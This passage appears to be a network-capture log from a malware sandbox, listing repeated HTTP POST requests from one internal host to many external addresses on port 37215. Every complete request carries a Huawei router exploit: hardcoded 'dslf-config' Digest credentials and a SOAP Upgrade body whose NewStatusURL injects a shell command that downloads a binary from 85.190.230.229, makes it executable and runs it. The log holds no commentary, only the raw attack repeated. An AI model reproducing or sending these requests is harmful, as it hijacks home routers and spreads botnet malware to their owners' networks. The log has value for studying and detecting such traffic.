69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      75192.168.2.1450070156.254.85.4937215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.651411057 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.994127035 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      76192.168.2.1437468197.0.89.10537215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.652344942 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.994131088 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      77192.168.2.1456450197.202.235.17137215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.653649092 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.994131088 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      78192.168.2.1452860156.209.43.1037215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.658109903 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.722161055 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.966108084 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      79192.168.2.144402241.237.166.11937215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.659331083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      80192.168.2.1447070102.77.171.4137215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.660517931 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
